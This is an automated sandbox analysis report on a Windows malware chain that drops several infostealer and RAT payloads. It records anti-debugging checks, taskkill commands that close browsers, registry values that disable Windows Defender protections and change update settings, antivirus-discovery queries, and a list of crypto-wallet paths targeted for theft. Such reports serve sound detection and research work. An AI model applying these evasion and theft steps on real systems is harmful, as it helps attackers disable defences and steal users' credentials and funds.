Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Open window title or class name: gbdyllo
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Open window title or class name: process monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Open window title or class name: procmon_window_class
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Open window title or class name: registry monitor - sysinternals: www.sysinternals.com
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Open window title or class name: ollydbg
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Open window title or class name: filemonclass
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Open window title or class name: file monitor - sysinternals: www.sysinternals.com

Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	File opened: NTICE
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	File opened: SICE
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	File opened: SIWVID

Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process queried: DebugPort	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Process queried: DebugPort
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Process queried: DebugPort

Source: C:\Users\user\Documents\CAFIJKFHIJ.exe

Code function: 9_2_05510C3B rdtsc

9_2_05510C3B

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C66AC62

Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_002F652B mov eax, dword ptr fs:[00000030h]	9_2_002F652B
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Code function: 9_2_002FA302 mov eax, dword ptr fs:[00000030h]	9_2_002FA302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_0053A302 mov eax, dword ptr fs:[00000030h]	10_2_0053A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 10_2_0053652B mov eax, dword ptr fs:[00000030h]	10_2_0053652B
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_0053A302 mov eax, dword ptr fs:[00000030h]	11_2_0053A302
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Code function: 11_2_0053652B mov eax, dword ptr fs:[00000030h]	11_2_0053652B

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Windows\SysWOW64\taskkill.exe	Process token adjusted: Debug
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Process token adjusted: Debug

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C66AC62 IsProcessorFeaturePresent,memset,memset,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

0_2_6C66AC62

Source: C:\Users\user\Desktop\file.exe

Memory protected: page guard

Jump to behavior

HIPS / PFW / Operating System Protection Evasion

Yara detected Powershell download and execute

Source: Yara match	File source: Process Memory Space: file.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 25045de666.exe PID: 5592, type: MEMORYSTR

.NET source code references suspicious native API functions

Source: 13.3.n4e23hz.exe.6f623b8.0.raw.unpack, Decryptor.cs	Reference to suspicious API methods: WinApi.LoadLibrary(sPath + "\\mozglue.dll")
Source: 13.3.n4e23hz.exe.6f623b8.0.raw.unpack, Decryptor.cs	Reference to suspicious API methods: WinApi.GetProcAddress(_hNss3, "NSS_Init")
Source: 13.3.n4e23hz.exe.6f623b8.0.raw.unpack, Keylogger.cs	Reference to suspicious API methods: MapVirtualKey(vkCode, 0u)

Source: C:\Users\user\Desktop\file.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c start "" "C:\Users\user\Documents\CAFIJKFHIJ.exe"	Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Users\user\Documents\CAFIJKFHIJ.exe "C:\Users\user\Documents\CAFIJKFHIJ.exe"	Jump to behavior
Source: C:\Users\user\Documents\CAFIJKFHIJ.exe	Process created: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe "C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe "C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe "C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe "C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe "C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe "C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe "C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Process created: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe "C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe"	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Process created: unknown unknown
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http://go.microsoft.com/fwlink/?prd=11324&pver=4.5&sbp=AppLaunch2&plcid=0x409&o1=SHIM_NOVERSION_FOUND&version=(null)&processName=d985563cac.exe&platform=0009&osver=6&isServer=0&shimver=4.0.30319.0
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Process created: unknown unknown

Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM opera.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM brave.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM firefox.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM chrome.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /F /IM msedge.exe /T
Source: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe	Process created: C:\Windows\SysWOW64\taskkill.exe

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C6B4760 malloc,InitializeSecurityDescriptor,SetSecurityDescriptorOwner,SetSecurityDescriptorGroup,GetLengthSid,GetLengthSid,GetLengthSid,malloc,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,PR_SetError,GetLastError,free,GetLastError,GetLastError,free,free,free,

0_2_6C6B4760

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C591C30 GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLengthSid,malloc,CopySid,CopySid,GetTokenInformation,GetLengthSid,malloc,CopySid,CloseHandle,AllocateAndInitializeSid,GetLastError,PR_LogPrint,

0_2_6C591C30

Source: f1628a2a52.exe, 00000013.00000002.2854638887.0000000000A42000.00000002.00000001.01000000.00000013.sdmp	Binary or memory string: Run Script:AutoIt script files (.au3, .a3x).au3;.a3xAll files (.).au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: file.exe, file.exe, 00000000.00000002.2124691295.0000000000E55000.00000040.00000001.01000000.00000003.sdmp	Binary or memory string: Program Manager
Source: CAFIJKFHIJ.exe, 00000009.00000002.2157923532.00000000004F7000.00000040.00000001.01000000.0000000B.sdmp, skotes.exe, 0000000A.00000002.2188401788.0000000000737000.00000040.00000001.01000000.0000000D.sdmp, skotes.exe, 0000000B.00000002.2194644865.0000000000737000.00000040.00000001.01000000.0000000D.sdmp	Binary or memory string: KProgram Manager
Source: d985563cac.exe, 00000010.00000002.3061989094.0000000000B53000.00000040.00000001.01000000.00000011.sdmp	Binary or memory string: \4Program Manager
Source: firefox.exe, 00000021.00000002.3028375375.0000009404A7B000.00000004.00000010.00020000.00000000.sdmp	Binary or memory string: ?ProgmanListenerWi

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C66AE71 cpuid

0_2_6C66AE71

Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Registry key value queried: HKEY_LOCAL_MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0			Jump to behavior

Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\file.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013558001\f1628a2a52.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe	Queries volume information: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe VolumeInformation	Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013551001\b24ae367e7.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013560001\c20459f2e6.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Users\user\AppData\Local\Temp\1013557001\25045de666.exe	Queries volume information: C:\ VolumeInformation

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C66A8DC GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,

0_2_6C66A8DC

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_6C5B8390 NSS_GetVersion,

0_2_6C5B8390

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Lowering of HIPS / PFW / Operating System Security Settings

Yara detected AsyncRAT

Source: Yara match

File source: 0000000D.00000003.2439904797.0000000005540000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY

Yara detected VenomRAT

Source: Yara match

File source: Process Memory Space: n4e23hz.exe PID: 5724, type: MEMORYSTR

Disable Windows Defender notifications (registry)

Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe

Registry key value created / modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications DisableNotifications 1

Disable Windows Defender real time protection (registry)

Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableIOAVProtection 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection	Registry value created: DisableRealtimeMonitoring 1
Source: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender Security Center\Notifications	Registry value created: DisableNotifications 1

Disables Windows Defender Tamper protection

Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe

Registry value created: TamperProtection 0

Modifies windows update settings

Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AUOptions
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate\AU AutoInstallMinorUpdates
Source: C:\Users\user\AppData\Local\Temp\1013559001\1124f3753f.exe	Key value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\WindowsUpdate DoNotConnectToWindowsUpdateInternetLocations

Source: d985563cac.exe, 00000012.00000002.2940566596.00000000013FA000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: ender\MsMpeng.exe
Source: n4e23hz.exe, 0000000D.00000003.2439904797.0000000005540000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MSASCui.exe
Source: d985563cac.exe, 0000001E.00000003.3060303366.0000000001480000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %\Windows Defender\MsMpeng.exe
Source: n4e23hz.exe, 0000000D.00000003.2439904797.0000000005540000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: procexp.exe
Source: d985563cac.exe, 00000010.00000003.2770556440.0000000001359000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2770514260.0000000001356000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000010.00000003.2976813594.00000000012B5000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000002.2940566596.00000000013FA000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 00000012.00000002.2940566596.00000000013E5000.00000004.00000020.00020000.00000000.sdmp, d985563cac.exe, 0000001E.00000003.3021596468.0000000001484000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
Source: n4e23hz.exe, 0000000D.00000003.2439904797.0000000005540000.00000004.00001000.00020000.00000000.sdmp	Binary or memory string: MsMpEng.exe

Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1013545001\n4e23hz.exe	WMI Queries: IWbemServices::ExecQuery - root\SecurityCenter2 : Select * from AntivirusProduct
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct
Source: C:\Users\user\AppData\Local\Temp\1013556001\d985563cac.exe	WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

Stealing of Sensitive Information

Yara detected Amadeys stealer DLL

Source: Yara match	File source: 9.2.CAFIJKFHIJ.exe.2c0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 11.2.skotes.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.2.skotes.exe.500000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000B.00000002.2193715295.0000000000501000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.2187919871.0000000000501000.00000040.00000001.01000000.0000000D.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2157462827.00000000002C1000.00000040.00000001.01000000.0000000B.sdmp, type: MEMORY

Yara detected Credential Flusher

Source: Yara match

File source: Process Memory Space: f1628a2a52.exe PID: 1608, type: MEMORYSTR

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: d985563cac.exe PID: 5796, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d985563cac.exe PID: 4600, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: d985563cac.exe PID: 8048, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP

Yara detected Stealc

Source: Yara match	File source: 00000000.00000002.2124046353.000000000059E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000003.2697522717.0000000005530000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2991880808.000000000071B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000002.2124461311.0000000000A81000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000002.2997900690.0000000000B61000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: 00000025.00000003.2903532225.0000000004CA0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2744434040.000000000179E000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000000.00000003.1688422254.0000000004B40000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000011.00000002.2739858298.0000000000B61000.00000040.00000001.01000000.00000012.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: file.exe PID: 7288, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 25045de666.exe PID: 5592, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP

Yara detected Vidar stealer

Source: Yara match

File source: Process Memory Space: file.exe PID: 7288, type: MEMORYSTR

Found many strings related to Crypto-Wallets (likely being stolen)

Source: file.exe, 00000000.00000002.2124461311.0000000000B4C000.00000040.00000001.01000000.00000003.sdmp	String found in binary or memory: 1\|\Blockstream\Green\wallets\\|.\|1\|Wasabi Wallet\|1\|\WalletWasabi\Client\Wallets\\|.json\|0\|Ethereum\|1\|\Ethereum\\|keystore\|0\|Electrum\|1\|\Electrum\wallets\\|.\|0\|ElectrumLTC\|1\|\Electrum-LTC\wallets\\|.\|0\|Exodus\|1\|\Exodus\\|exodus.conf.json\|0\|Exodus\|1\|\Exodus\\|window-state.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|passphrase.json\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|seed.seco\|0\|Exodus\exodus.wallet\|1\|\Exodus\exodus.wallet\\|info.seco\|0\|Electron Cash\|1\|\ElectronCash\wallets\\|.\|0\|MultiDoge\|1\|\MultiDoge\\|multidoge.wallet\|0\|Jaxx Desktop (old)\|1\|\jaxx\Local Storage\\|file__0.localstorage\|0\|Jaxx Desktop\|1\|\com.liberty.jaxx\IndexedDB\file__0.indexeddb.leveldb\\|.\|0\|Atomic\|1\|\atomic\Local Storage\leveldb\\|.\|0\|Binance\|1\|\Binance\\|app-store.json\|0\|Binance\|1\|\Binance\\|simple-storage.json\|0\|Binance\|1\|\Binance\\|.finger-print.fp\|0\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.wallet\|1\|Coinomi\|1\|\Coinomi\Coinomi\wallets\\|.config\|1\|Ledger Live\Local 